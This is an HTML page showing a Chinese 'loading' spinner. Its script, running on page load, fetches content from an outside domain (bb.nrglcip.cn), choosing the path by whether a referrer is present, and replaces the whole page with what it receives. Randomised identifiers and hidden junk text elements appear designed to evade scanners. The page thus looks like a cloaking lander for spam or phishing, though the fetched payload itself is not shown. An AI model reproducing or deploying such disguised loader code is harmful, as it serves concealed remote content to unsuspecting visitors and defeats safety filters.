<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .ejriKhA4yZ {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .ejriKhA4yZ .SgxaMdSO {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .ejriKhA4yZ .content {
            line-height: 50px;
            text-align: center
        }

        .ejriKhA4yZ .img {
            width: 100%
        }

        .ejriKhA4yZ .TZO4tMMdS {
            text-align: center
        }

        .ejriKhA4yZ .TZO4tMMdS span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .ejriKhA4yZ .TZO4tMMdS span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .ejriKhA4yZ .TZO4tMMdS span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .ejriKhA4yZ .TZO4tMMdS span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .ejriKhA4yZ .TZO4tMMdS span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .ejriKhA4yZ .TZO4tMMdS span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .ejriKhA4yZ .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Kt6RWHfs8Q1u(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var P3bf81 = Kt6RWHfs8Q1u('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ P3bf81 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ P3bf81 +".html?a=share";
		}
		
        av0RlaOVy=url+"#"+new Date().getTime();
        av0RlaOVy && function() {
            $.get(av0RlaOVy, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >NMQcGGh3gWHjeRo7O1wgR0eucE8HMGJl2yDMu3Fvz8TuK</b>
<p  style='display:none'>sOkzcVDnrmHxbdV0Y8j9hl8C1wCs0K48H3ZfaojOxLTHbVEXfudDYhwwA8b5nlEvU</p>
<h1 style='display:none' >pCb1N2IoXeHb</h1>
<div style='display:none'>zPteC0RWbEDalXTl4klwuhh5PDhQOMtlb88UX</div><div class="ejriKhA4yZ">
    <div class="SgxaMdSO">
        <div class="TZO4tMMdS">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >s5xsTF8FlDKN1mVnXWEQ2nwUW1LPTHraBjpF1XuyfLPif6HckQFAVpwF8hEIGfRf1sEuCP2l5DpNQBQY6OStVrdCcftLhHp27hL</ul>
<a  href='#' style='display:none'>RPQEltToBzAs6KQWUbNtRh1b3rXIp3z5eET3HPpe</a>
<b style='display:none' >bIvFD16hXMov5XCY2xXolD5FX5HPuQqkFZUU8Co9sR4s6Qw90QkZJHT1QparmlVtMIpgDCxK8XT4</b>
<b style='display:none' >bIvFD16hXMov5XCY2xXolD5FX5HPuQqkFZUU8Co9sR4s6Qw90QkZJHT1QparmlVtMIpgDCxK8XT4</b>
<li style='display:none' >MtWxbqyQtkGhfq5oQlJz58fvGxOVNk9cevSJxlYQZh4U</li></body>
</html>